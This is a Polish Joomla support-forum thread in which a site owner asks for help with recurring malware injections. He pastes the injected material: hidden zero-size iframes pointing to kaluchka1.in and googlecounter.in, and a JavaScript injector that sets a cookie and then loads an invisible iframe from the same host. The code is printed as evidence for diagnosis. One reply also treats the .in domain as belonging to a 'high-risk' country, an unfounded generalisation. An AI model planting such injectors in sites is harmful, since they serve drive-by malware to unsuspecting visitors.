PDA

Zobacz pełną wersję : Problem z wirusem -> iframe src=http://s1.kaluchka1.in/



krzychoooo
12-01-2012, 15:06
Witam
Co kilka dni do plików php html js dokleja mi się taki kod:

<!--qpi--><iframe src=http://s1.kaluchka1.in/gate.php?f=955068 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=0 height=0 border=0></iframe><!--/qpi-->

Jak coś chce zmienić na stronie to :
- kasuje całą stronę i bazę danych.
- przywracam stronę z kopi która w żadnym pliku nie ma takiego kodu .
- dokonuje zmiany.
- robię kopie (Akeea backup)

Od jakiegoś czasu nie moge dojść skąd to się bierze.
Joomla 1.7.3
Ustawienia php według zaleceń, .htaccess funkcjonuje.

Czy miał ktoś podobny problem?

nikszal
12-01-2012, 15:12
Od jakiegoś czasu nie moge dojść skąd to się bierze.

Strzelę w ciemno - zainstalowałeś jakieś rozszerzenie pochodzące z niepewnego źródła, nie daj Boże z jakiegoś wareza na przykład?

Zmień hasła (zaplecze, serwer FTP), ściągnij witrynę na serwer lokalny i szukaj źródła problemu.

robak142
12-01-2012, 15:12
Prawdopodobnie wykradziono Ci hasła do ftp. Po pierwsze zmień hasła ftp, po drugie nie wpisuj ich na stałe np w TC, po trzecie dogłębnie przeskanuj komputer.

krzychoooo
12-01-2012, 15:28
Dodatki komponenty itd pobierałem z http://extensions.joomla.org/.
Szablon zakupiony w firmie SmartAddons.Com.
Zainstalowany dodatek "spadaj".
Hasło do ftp już zmieniałem.
Komputer przeskanowany avast'em.
Hasło nie zapisane na twardym. Hmm tylko jeśli coś mi nasłuc***e na porcie 21 to i tak przechwyci hasło.
Czy da się w XP jakoś założyć loga co się dzieje na porcie 21?
W plikach js jet oczywiście trochę inny wpis:


/*qpi*/
function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled)
{
document.cookie='1=1;expires='+e.toGMTString()+';p ath=/';
window.setTimeout(function(){
var JSinj=document.createElement('iframe');
JSinj.src='http://s1.kaluchka1.in/gate.php?f=955068&r='+escape(document.referrer||'');
JSinj.width='0';
JSinj.height='0';
JSinj.frameborder='0';
JSinj.marginheight='0';
JSinj.marginwidth='0';
JSinj.border='0';
try{
document.body.appendChild(JSinj);
}catch(e){
document.documentElement.appendChild(JSinj);
}
}, 2000);
}
/*qpi*/

nikszal
12-01-2012, 15:35
Komputer przeskanowany avast'em.
Proponuję coś lepszego zainstalować. Kaspersky Internet Security nie jest drogi.

krzychoooo
12-01-2012, 17:21
W plikach szablonu znalazłem taki kod:

<!--qpi--><iframe src=http://googlecounter.in/gate.php?f=861280 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=0 height=0 border=0></iframe><!--/qpi--><!--qpi--><!--/qpi--><!--qpi--><!--qpi-->
na stronie googli do diagnozowania witryn
http://google.com/safebrowsing/diagnostic?site=googlecounter.in/&hl=pl
Jest taki wpis:


Bezpieczne przeglądanie
Strona diagnostyczna witryny googlecounter.in

Jaki jest obecny stan bezpieczeństwa witryny googlecounter.in?

Ta witryna nie jest obecnie uznawana za podejrzaną.

Co się stało podczas odwiedzin tej witryny przez Google?

W ciągu ostatnich 90 dni przetestowaliśmy w tej witrynie następującą liczbę stron: 880. Wyświetlanie 0 z nich spowodowało pobranie i zainstalowanie złośliwego oprogramowania bez zgody użytkownika. Witryna ta po raz ostatni była odwiedzana przez Google 2012-01-11, a po raz ostatni znaleziono w niej podejrzane treści 2012-01-11.

Złośliwe oprogramowanie obejmuje 423 trojan(s), 72 exploit(s), 69 scripting exploit(s).

Ta witryna działała w następującej liczbie sieci: 2, m.in. AS35017 (SWIFTWAY), AS24971 (MASTER).

Czy ta witryna pośredniczyła w rozpowszechnianiu złośliwego oprogramowania?

Wydaje się, że w ciągu ostatnich 90 dni witryna googlecounter.in pośredniczyła w zarażeniu następującej liczby witryn: 125, m.in. haberunye.com/, euromarkt.pl/, lospeques.com/.
Co to jest ten googlecounter ?

mjmartino
12-01-2012, 21:28
Jak masz jakieś podejrzenia co do obcego iframe co jest zresztą dziwne w szablonie to go usuń i poczekaj na efekty.

zwrócona zawartość iframe


The requested URL /out.php?p=mhaBxKqEnAXIVTaOhY2k43ObuL3W2SoC0oi6MHkU wsOOmiF0ZgONSaEMHm2qXTmHFDxGZbvJNUJg43GRLptlNkBhD+ jA08CshZKWHhmTzAL3FzsNDDNwPHa1Fngdwg==&nc=false&nj=false&ic=false&ds=false&iu=false&wc=false&sw=1680&sh=1050&sd=32&np=false&pm=Win32&is_iframe=false& was not found on this server.
Czy to coś zbiera informacje a przynajmniej uzyskuje rozdzielczość głębie oraz system : )

Poza tym domena .in wskazuje na INDIE czyli kraj wysokiego ryzyka rozsyłania różnych rzeczy.. wiec .httaccess i deny dla owej domeny; )